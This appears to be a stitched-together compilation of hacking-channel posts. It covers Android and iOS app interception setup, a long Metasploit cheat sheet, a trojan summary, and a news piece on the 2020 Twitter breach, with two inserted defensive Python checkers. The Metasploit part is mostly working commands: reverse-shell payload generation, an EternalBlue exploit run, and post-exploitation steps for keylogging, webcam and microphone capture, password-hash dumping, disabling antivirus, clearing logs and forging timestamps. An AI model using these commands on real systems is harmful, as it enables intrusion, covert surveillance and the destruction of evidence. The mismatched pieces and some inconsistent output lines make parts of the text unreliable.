Mobile Application Test Notes (Android)
Prepping the application
(After Android Nougat, apps need to be repackaged since they don't trust user certificates by default)
- https://android-developers.googleblog.com/2016/07/changes-to-trusted-certificate.html
+ apktool d <path of the .apk file>
+ Update AndroidManifest.xml
- Add android:networkSecurityConfig="@xml/networksecurityconfig" to application tag in xml
+ Add networksecurityconfig.xml to res/xml folder
- "Trusting user-added CAs for all secure connections" section in
https://android-developers.googleblog.com/2016/07/changes-to-trusted-certificate.html
+ Repackage the application
- apktool b unpackedapkfolder -o <output path to new apk file>
+ Signing the application
- Create a keystore using keytool
- jarsigner -keystore <path to your keystore> -storepass <password> -keypass <password> <path to apk> android
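The repackaging steps above depend on the network security config that makes the app trust user-added CAs. As an added example (not part of the original notes), this Python check reads a decoded res/xml network security config and reports which scopes trust the user CA store, which is also how to confirm that a release build does not ship with the test setting. Both XML samples are constructed and the function names are hypothetical.

```python
import xml.etree.ElementTree as ET

# Constructed sample: the config a repackaged test build carries so that a
# user-installed proxy CA is trusted for every connection.
TEST_BUILD_CONFIG = """<network-security-config>
    <base-config>
        <trust-anchors>
            <certificates src="system" />
            <certificates src="user" />
        </trust-anchors>
    </base-config>
</network-security-config>"""

# Constructed sample: a release-style config. User CAs are trusted only under
# <debug-overrides>, which Android applies only when android:debuggable="true".
RELEASE_CONFIG = """<network-security-config>
    <base-config cleartextTrafficPermitted="false">
        <trust-anchors>
            <certificates src="system" />
        </trust-anchors>
    </base-config>
    <domain-config>
        <domain includeSubdomains="true">api.example.com</domain>
        <trust-anchors>
            <certificates src="system" />
        </trust-anchors>
    </domain-config>
    <debug-overrides>
        <trust-anchors>
            <certificates src="user" />
        </trust-anchors>
    </debug-overrides>
</network-security-config>"""

SCOPES = ("base-config", "domain-config", "debug-overrides")


def _scope_name(elem):
    """Label a scope; domain-config scopes are labelled with their domains."""
    if elem.tag == "domain-config":
        domains = [d.text.strip() for d in elem.findall("domain") if d.text]
        return "domain-config(" + ",".join(domains) + ")"
    return elem.tag


def audit_network_security_config(xml_text):
    """Return one finding per trust scope, in document order.

    An empty trust_sources list means the scope declares no anchors of its
    own and inherits them from its parent scope.
    """
    root = ET.fromstring(xml_text)
    if root.tag != "network-security-config":
        raise ValueError("not a network security config: <%s>" % root.tag)
    findings = []

    def walk(parent):
        for elem in parent:
            if elem.tag not in SCOPES:
                continue
            sources = [c.get("src", "")
                       for c in elem.findall("trust-anchors/certificates")]
            findings.append({
                "scope": _scope_name(elem),
                "trust_sources": sources,
                "trusts_user_cas": "user" in sources,
                "cleartext_permitted": elem.get("cleartextTrafficPermitted", "unset"),
            })
            if elem.tag == "domain-config":
                walk(elem)  # domain-config elements may be nested

    walk(root)
    return findings


def user_cas_trusted_in_release(xml_text):
    """True if any scope other than debug-overrides trusts the user CA store."""
    return any(f["trusts_user_cas"] and f["scope"] != "debug-overrides"
               for f in audit_network_security_config(xml_text))


if __name__ == "__main__":
    for label, cfg in (("test build", TEST_BUILD_CONFIG), ("release", RELEASE_CONFIG)):
        print(label, "-> user CAs trusted in release:", user_cas_trusted_in_release(cfg))
        for finding in audit_network_security_config(cfg):
            print("   ", finding)
```

A repackaged test build should report the base-config scope as trusting user CAs; the same finding on a production APK means any CA the device owner installs can intercept the app's TLS traffic.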
Creating an emulator and installing the application
+ Create a virtual device:
- android avd
+ Start the emulator:
- emulator -avd testavd
+ Install the application:
- adb install <path of the .apk file>
+ Open Burp Suite and navigate to Proxy->Options,
- Edit proxy listeners - enter "port" as 8080, disable "loopback only" and select "support invisible".
+ Start the emulator and proxy:
- emulator -avd testavd -http-proxy http://localhost:8080
+ Download and install burp certificate (.crt) onto the emulator using the push shell command.
Notes:
+ Application file type - x.apk
Install Certs: http://www.realmb.com/droidCert/
SQLite Database Browser: http://sourceforge.net/projects/sqlitebrowser/?source=pdlp
http://www.mcafee.com/uk/resources/white-papers/foundstone/wp-pen-testing-android-apps.pdf
Mobile Application Test Notes (iPhone)
Prepping Device and Application:
+ Jailbreak iPhone/iPad - Green Poison / Absinthe 2.04
+ Enable SSH on iPhone/iPad
+ Install iFunbox to install the application (http://www.i-funbox.com)
+ Connect device to lab wireless network
+ Add web proxy settings - IP address of attacking machine port 8080
+ Ensure connection and SSH is working
Prepping Burp Suite:
+ Open Burp Suite and navigate to Proxy->Options,
- Edit proxy listeners - enter "port" as 8080, disable "loopback only" and select "support invisible".
+ Download and install burp certificate (.crt) onto ipad.
Mobile Application Penetration Testing:
+ Browse the following Directory for insecure storage
- /private/var/mobile/applications/
Notes:
+ Application file type - x.ipa
+ Easy way:
- Place attacking machine and apple device on wireless network with app installed.
- Email Burp's .cer to the Apple device and install it
- Start burp and disable firewall on listening machine.
- Change proxy settings on apple device to point to listening burp machine/port.
METASPLOIT
#FastTips
Search for exploits using Metasploit GitHub framework source code:
https://github.com/rapid7/metasploit-framework
Translate them for use on OSCP LAB or EXAM.
Metasploit
Metasploit requires PostgreSQL
systemctl start postgresql
To enable PostgreSQL on startup
systemctl enable postgresql
MSF Syntax
Start metasploit
msfconsole
msfconsole -q
Show help for command
show -h
Show Auxiliary modules
show auxiliary
Use a module
use auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/http/webdav_scanner
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/ftp/ftp_login
use exploit/windows/pop3/seattlelab_pass
Show the basic information for a module
info
Show the configuration parameters for a module
show options
Set options for a module
set RHOSTS 192.168.1.1-254
set THREADS 10
Run the module
run
Execute an Exploit
exploit
Search for a module
search type:auxiliary login
Metasploit Database Access
Show all hosts discovered in the MSF database
hosts
Scan for hosts and store them in the MSF database
db_nmap
Search machines for specific ports in MSF database
services -p 443
Leverage MSF database to scan SMB ports (auto-completed rhosts)
services -p 443 --rhosts
You may find some boxes that are vulnerable to MS17-010 (AKA EternalBlue). Although not officially part of the intended course, this exploit can be leveraged to gain SYSTEM level access to a Windows box. I have never had much luck using the built in Metasploit EternalBlue module. I found that the elevenpaths version works much more reliably. Here are the instructions to install it taken from the following YouTube video: https://www.youtube.com/watch?v=4OHLor9VaRI
1. First step is to configure the Kali to work with wine 32bit
dpkg --add-architecture i386 && apt-get update && apt-get install wine32
rm -r ~/.wine
wine cmd.exe
exit
2. Download the exploit repository
https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
3. Move the exploit to /usr/share/metasploit-framework/modules/exploits/windows/smb
4. Start metasploit console (spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.)
use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(eternalblue_doublepulsar) > set RHOST 10.10.10.10
RHOST => 10.11.1.73
msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT spoolsv.exe
PROCESSINJECT => spoolsv.exe
msf exploit(eternalblue_doublepulsar) > run
####Experimenting with Meterpreter####
Get system information from Meterpreter Shell
sysinfo
Get user id from Meterpreter Shell
getuid
Search for a file
search -f *pass*.txt
Upload a file
upload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec
Download a file
download c:\\Windows\\system32\\calc.exe /tmp/calc.exe
Invoke a command shell from Meterpreter Shell
shell
Exit the meterpreter shell
exit
Metasploit Exploit Multi Handler
multi/handler to accept an incoming reverse_https_meterpreter payload
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST $ip
set LPORT 443
exploit
[*] Started HTTPS reverse handler on https://$ip:443/
Building Your Own MSF Module
mkdir -p ~/.msf4/modules/exploits/linux/misc
cd ~/.msf4/modules/exploits/linux/misc
cp /usr/share/metasploit-framework/modules/exploits/linux/misc/gld_postfix.rb ./crossfire.rb
nano crossfire.rb
Post Exploitation with Metasploit - (available options depend on OS and Meterpreter Capabilities)
download - Download a file or directory
upload - Upload a file or directory
portfwd - Forward a local port to a remote service
route - View and modify the routing table
keyscan_start - Start capturing keystrokes
keyscan_stop - Stop capturing keystrokes
screenshot - Grab a screenshot of the interactive desktop
record_mic - Record audio from the default microphone for X seconds
webcam_snap - Take a snapshot from the specified webcam
getsystem - Attempt to elevate your privilege to that of local system.
hashdump - Dumps the contents of the SAM database
FOR BEGINNERS:
+ Creating Metasploit Payloads
List payloads
msfvenom -l
Binaries
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
Web Payloads
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
Scripting Payloads
Python
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
Shellcode
For all shellcode see "msfvenom --help-formats" for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Handlers
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z
Once the required values are completed the following command will execute your handler: "msfconsole -L -r "
Meterpreter Study Notes
# Basic system commands
background # place the current session in the background
sessions # list sessions; -h shows help
sessions -i <ID value> # enter the session; -k kills a session
bgrun / run # execute an existing module; type run and press Tab twice to list the available scripts
info # View existing module information
getuid # View current user identity
getprivs # View current user permissions
getpid # Get current process ID (PID)
sysinfo # View target machine system information
irb # Open ruby terminal
ps # View running processes
kill <PID value> # Kill the specified PID process
idletime # View target idle time
reboot / shutdown # Restart / Shutdown
shell # Enter target cmd shell
The Most requested hacking tutorial :
Bypassing Application Whitelisting By Using dnx.exe
Helpful Commands for any hacker:
# uictl: switch keyboard / mouse
uictl [enable/disable] [keyboard/mouse/all] # enable or disable keyboard/mouse
uictl disable mouse # disable mouse
uictl disable keyboard # disable keyboard
# execute: run an executable file
execute # run an executable file on the target machine
execute -H -i -f cmd.exe # create a new cmd.exe process; -H invisible, -i interactive
execute -H -m -d notepad.exe -f payload.exe -a "-o hack.txt"
# -d process name displayed on the target host during execution (for masquerading); -m execute directly from memory
# "-o hack.txt" is the argument passed to payload.exe
# migrate: process migration
getpid # Get the current process's pid
ps # View the current active processes
migrate <pid value> # Migrate the Meterpreter session into the process with the specified pid
kill <pid value> # kill the process
# clearev: clear logs
clearev # Clear application logs, system logs, security logs in Windows
# timestomp: forge timestamps
timestomp C:\\ -h # View help
timestomp -v C:\\2.txt # View timestamp
timestomp C:\\2.txt -f C:\\1.txt # Copy the timestamp of 1.txt to 2.txt
timestomp c:\\test\\22.txt -z "03/10/2019 11:55:55" -v # Set the four properties to uniform time
# portfwd: port forwarding
portfwd add -l 1111 -p 3389 -r 127.0.0.1 # Forward port 3389 of the target machine to local port 1111
rdesktop 127.0.0.1:1111 # Need to enter the username and password to connect
rdesktop -u Administrator -p 123 127.0.0.1:1111 # -u username -p password
# autoroute: add route
run autoroute -h # View help
run get_local_subnets # View target intranet segment address
run autoroute -s 192.168.183.0/24 # Add target network segment route
run autoroute -p # View added route
run post/windows/gather/arp_scanner RHOSTS=192.168.183.0/24
run auxiliary/scanner/portscan/tcp RHOSTS=192.168.183.146 PORTS=3389
# Socks proxy
Reference: https://www.freebuf.com/articles/network/125278.html
use auxiliary/server/socks4a
set srvhost 127.0.0.1
set srvport 2000
run
# Common scripts:
run arp_scanner -r 192.168.183.1/24 # Use ARP to scan for live hosts
run winenum # automate some detection scripts
run credcollect # get user hash
run domain_list_gen # get domain management account list
run post/multi/gather/env # get user environment variables
run post/windows/gather/enum_logged_on_users -c # List currently logged-in users
run post/linux/gather/checkvm # check whether the target is a virtual machine
run post/windows/gather/checkvm # check whether the target is a virtual machine
run post/windows/gather/forensics/enum_drives # View drive information
run post/windows/gather/enum_applications # Get installed software information
run post/windows/gather/dumplinks # Get recently accessed documents, link information
run post/windows/gather/enum_ie # Get IE cache
run post/windows/gather/enum_firefox # Get firefox cache
run post/windows/gather/enum_chrome # Get Chrome cache
run post/multi/recon/local_exploit_suggester # Get local privilege vulnerability
run post/windows/gather/enum_patches # Get patch information
run post/windows/gather/enum_domain # Find domain controller
run post/windows/gather/enum_snmp # Get snmp community name
run post/windows/gather/credentials/vnc # Get vnc password
run post/windows/wlan/wlan_profile # Used to read the target host WiFi password
run post/multi/gather/wlan_geolocate # Locate the target based on WLAN; the result file is saved under /root/.msf4/loot
run post/windows/manage/killav # close antivirus software
Crack-Sniffer-Keylogger-webcam modules:
# Common crack modules
auxiliary/scanner/mssql/mssql_login
auxiliary/scanner/ftp/ftp_login
auxiliary/scanner/ssh/ssh_login
auxiliary/scanner/telnet/telnet_login
auxiliary/scanner/smb/smb_login
auxiliary/scanner/mysql/mysql_login
auxiliary/scanner/oracle/oracle_login
auxiliary/scanner/postgres/postgres_login
auxiliary/scanner/vnc/vnc_login
auxiliary/scanner/pcanywhere/pcanywhere_login
auxiliary/scanner/snmp/snmp_login
auxiliary/scanner/ftp/anonymous
# Keylogger
keyscan_start # Start key record
keyscan_dump # Export record data
keyscan_stop # End key record
# Sniffer packet capture
use sniffer
sniffer_interfaces # View NICs
sniffer_start 1 # Select NIC 1 to start capturing
sniffer_stats 1 # View NIC 1 status
sniffer_dump 1 /tmp/wlan1.pcap # Export pcap packets
sniffer_stop 1 # Stop NIC 1 capture
sniffer_release 1 # Release NIC 1 traffic
# Webcam
record_mic # audio recording
webcam_chat # open a video chat (a window pops up on the other party's side)
webcam_list # view cameras
webcam_snap # take a picture through the camera
webcam_stream # open live video monitoring through the camera (viewed as a web page)
# Screen capture
screenshot # Screenshots
use espia # Use espia module
screengrab # screenshot
The latest variant of the EternalBlue downloader resumes EXE file attacks, and the new variant has infected 15,000 servers :
> A new variant of the EternalBlue downloader Trojan. This variant uses Python to package EXE executable files for attacks. The organization used a similar method at the end of 2018. Tencent security big data monitoring shows that the latest variant of the EternalBlue downloader spread quickly after it appeared. It has infected about 15,000 servers. The infected system is finally used to download and run the Monero mining Trojan.
> In the process of continuous evolution and update, the EternalBlue downloader Trojan had gradually switched from the EXE attack mode to PowerShell scripts to achieve fileless attacks. After its functions grew larger and larger, the gang again added the code for the EternalBlue vulnerability attack and the MSSQL brute-force attack to the EXE Trojan, and disabled the relevant code in PowerShell.
> A system hit by this variant will download if.bin, download and run an EXE attack module named with a random string for large-scale vulnerability scanning and attack propagation, and will also download the Monero mining Trojan, which occupies a large amount of CPU resources on the server. Mining will cause severe productivity losses to the affected enterprises.
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
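A defender-side triage sketch for the behaviour described in the post above: an `if.bin` download, a randomly named EXE, and mass scanning for the EternalBlue (SMB, TCP 445) and MSSQL (TCP 1433) attacks. This is an added example, not part of the original post; the event format, host names, addresses, threshold, directory allowlist and name heuristic are all assumptions, and the sample events are constructed.

```python
import re
from collections import defaultdict

# Ports tied to the two propagation methods named in the post.
FANOUT_PORTS = {445: "smb_fanout", 1433: "mssql_fanout"}
FANOUT_THRESHOLD = 20  # assumed: distinct peers before a host counts as scanning
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\program files\\")  # assumed allowlist


def random_looking(path):
    """Crude heuristic: letters-only .exe name, >= 8 chars, at most 25% vowels."""
    name = path.lower().rsplit("\\", 1)[-1]
    match = re.fullmatch(r"([a-z]{8,})\.exe", name)
    if not match:
        return False
    stem = match.group(1)
    return sum(c in "aeiou" for c in stem) / len(stem) <= 0.25


def triage(events):
    """Return {host: [signals]} for hosts showing at least two of the behaviours."""
    signals = defaultdict(set)
    peers = defaultdict(set)
    for host, kind, detail in events:
        if kind == "http" and re.search(r"/if\.bin(\?|$)", detail.lower()):
            signals[host].add("if.bin_download")
        elif kind == "proc":
            outside_trusted = not detail.lower().startswith(TRUSTED_DIRS)
            if outside_trusted and random_looking(detail):
                signals[host].add("random_exe")
        elif kind == "flow":
            ip, port = detail.rsplit(":", 1)
            if int(port) in FANOUT_PORTS:
                peers[(host, int(port))].add(ip)
    # A host contacting many distinct peers on 445 or 1433 looks like a scanner.
    for (host, port), ips in peers.items():
        if len(ips) >= FANOUT_THRESHOLD:
            signals[host].add(FANOUT_PORTS[port])
    # One signal alone is weak (a file server has SMB fan-out); require two.
    return {h: sorted(s) for h, s in signals.items() if len(s) >= 2}


# Constructed sample telemetry as (host, kind, detail) tuples.
SAMPLE = (
    [("srv-db01", "http", "http://198.51.100.7/if.bin"),
     ("srv-db01", "proc", r"C:\Windows\Temp\qkzxvwjhbt.exe")]
    + [("srv-db01", "flow", f"10.0.0.{i}:445") for i in range(1, 41)]
    + [("srv-db01", "flow", f"10.0.1.{i}:1433") for i in range(1, 31)]
    + [("ws-042", "http", "http://intranet.example/notif.bin"),
       ("ws-042", "proc", r"C:\Windows\System32\svchost.exe"),
       ("ws-042", "flow", "10.0.0.10:445")]
    + [("fileadmin", "flow", f"10.0.2.{i}:445") for i in range(1, 26)]
)

if __name__ == "__main__":
    for host, hits in triage(SAMPLE).items():
        print(host, hits)
```

Requiring two independent signals keeps a busy file or backup server, which legitimately talks SMB to many peers, out of the results.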
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Best Boot - Repair access to operating systems
GRUB reinstall, MBR restore, UEFI, SecureBoot, RAID, LVM, Wubi, filesystem repair... :
Download : https://sourceforge.net/p/boot-repair/home
#FastTips
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
What network tools should you choose?
#FastTips
> The most advanced network monitoring tools can also perform the following 5 functions:
1. Network and application monitoring
2. Network problem analysis
3. Application data and stream interception analysis
4. Virtualization and operating system problem detection
5. Root cause analysis
Different network performance monitoring vendors perform these tasks at different levels of granularity. Moreover, the more precise the task, the more complicated it is to implement and manage. Therefore, we must accurately understand the needs of our organization, and then properly balance granularity and complexity.
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
We all know what happened to Twitter, but here are the real details :
#news
Twitter mass hacking may evolve into a global security crisis
Sina Technology News, July 16th, Beijing time: according to foreign media reports, Bitcoin scammers will not be the last to steal a verified account. We should be vigilant, because there will be other people who steal our accounts.
All of this was to be expected.
The hacker attack on July 15, 2020 is the worst security breach in Twitter's history. No matter how the company ultimately tells the story, one thing must be acknowledged: the crisis began brewing a few years ago.
Since the spring of 2018, scammers have been posing as the well-known cryptocurrency enthusiast Elon Musk. They use Musk's avatar, choose a similar username, and then post an enticing offer that looks too good to be true: lend him some cryptocurrency and he will give you back more. Sometimes scammers reply to a related verified account (such as Musk's SpaceX) to make the fake account look more real. Scammers also spread the fake tweets through botnets, again to increase their apparent authenticity.
The events of 2018 showed us three things. First, there are always people who are deceived, and every time someone is deceived, it is enough to inspire further fraud. Second, Twitter's handling of this threat is slow, falling far short of the company's early promise to take these issues seriously. Third, the needs of scammers and Twitter's initial countermeasures formed a cat-and-mouse game, which in turn encouraged criminals to take more aggressive actions to cause damage.
And so we arrive at today's attack, the largest yet. Nick Statt reports:
"Large companies' and individuals' Twitter accounts have recently encountered the largest hacker attack on the platform ever. All attacks are aimed at promoting bitcoin scams, and the initiators seem to have earned a small amount of money from them. We don't know how the attack happened, or how much damage was done to Twitter's own systems. The hackers seem to have stopped, but verified accounts had been posting new scam tweets since 4 pm Eastern time, which lasted for more than two hours. After more than one hour of silence, Twitter finally acknowledged the hacker attack. At 5:45 ET, it wrote on the company's user support account: 'We have been informed of the security incidents affecting users of our platform. We are investigating and actively taking measures to respond to the attack. We will provide you with the latest information as soon as possible.'"
The verified accounts of former President Barack Obama, Joe Biden, Amazon CEO Jeff Bezos, Bill Gates, and pop singer Kanye West, among others, as well as those of Apple, Uber, and other technology companies, were hacked.
But those all came later. Who was the first celebrity account to be attacked? Elon Musk, no doubt.
In the first few hours of the hack, the deceived people sent more than 118,000 dollars to the hackers. In addition, the hackers may also have accessed a large number of personal direct messages. Even more disturbing are the speed and scale of the attack, as well as the deeper national security issues.
Of course, the most important and most obvious question is who initiated the attack and how they did it. As of press time, we have no answer. According to a report by security reporter Joseph Cox, screenshots shared among members of the underground hacker community show that someone could access the tools used to manage accounts within Twitter. Cox wrote:
"Two sources in the underground hacker community provided a screenshot of an internal control panel to the media. It is alleged that Twitter employees use this internal control panel to manage user accounts. A source said that this Twitter control panel is also used to change the ownership of certain so-called OG accounts. Twitter has deleted screenshots of these control panels and suspended the user accounts that posted these screenshots, saying the content violates community rules."
Continuing to speculate will inevitably appear irresponsible, but Cox's report at least makes clear that this is not a simple, ordinary hacking incident. One possibility is that a hacker broke into Twitter's internal tools. Cox also proposed another possibility: that there is an insider among Twitter's employees who took part in this attack. If that is the case, then Twitter has truly hit the jackpot this year. Twice.
In either case, Twitter's response to this incident has caused further confusion. The company's earliest tweet about the matter contained essentially nothing of substance. Two hours later, Twitter simply stated that it had disabled tweeting for verified accounts, or had reset their passwords, while it tried to investigate the root cause of the attack. But even before Twitter explained the situation, many users had already found out the hard way that they couldn't tweet.
Politicians, celebrities, and national news media being unable to tweet at least saves Twitter some public relations trouble. Ordinary users may find this laughable, but consider the more serious problems. Twitter, for better or worse, is one of the most important communication systems in the world. Many of its users are related to emergency medical services. For example, the National Weather Service in Lincoln, Illinois had just issued a tornado warning before verified accounts were blocked. Those who rely on this account to follow the tornado may have been out of luck.
Of course, Twitter's ban on posts from verified accounts was also a last resort. People would probably rather the National Weather Service be unable to tweet than have hackers sell its account to criminals, who then log in to post false information, such as falsely claiming that tornadoes are sweeping the major cities of the United States. But solving the problem with this clumsy method, prohibiting most of the 359,000 verified accounts from publishing messages, reflects the wide scope of the incident.
Then you can't help but wonder what emergency measures the company will take if next time it is not a greedy bitcoin scammer, but a state-level actor or a mentally unstable person. After this incident, it is not difficult to imagine someone taking control of a world leader's account and then attempting to launch a nuclear war.
At this point, what Republican Senator Josh Hawley of Missouri wrote in his letter to Twitter CEO Jack Dorsey resonates strongly. Hawley said:
"I am concerned that this incident is not just a series of planned and premeditated independent hacker attacks, but also a successful attack on Twitter's own security. As you know, your millions of users not only rely on your service to publish tweets publicly but also use your direct messaging service to communicate with each other in private. Successful attacks on your system's servers will pose a threat to the privacy and data security of all users."
However, Hawley did not capture the whole picture. It is not only user privacy and data security that are threatened here. More importantly, impersonation and fraud on Twitter are very likely to cause turmoil in the real world. Today, we have seen this scenario actually happen. With less than four months left before the 2020 election, God knows exactly what will happen.
In the next few days, Twitter may investigate the cause of the security incident. The company may not be able to give a completely satisfactory explanation. But the important thing is that Twitter shares with the public, in a timely manner, what it has learned about the incident and what measures the company will take in the future to prevent such a thing from happening again. (noob)
@โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ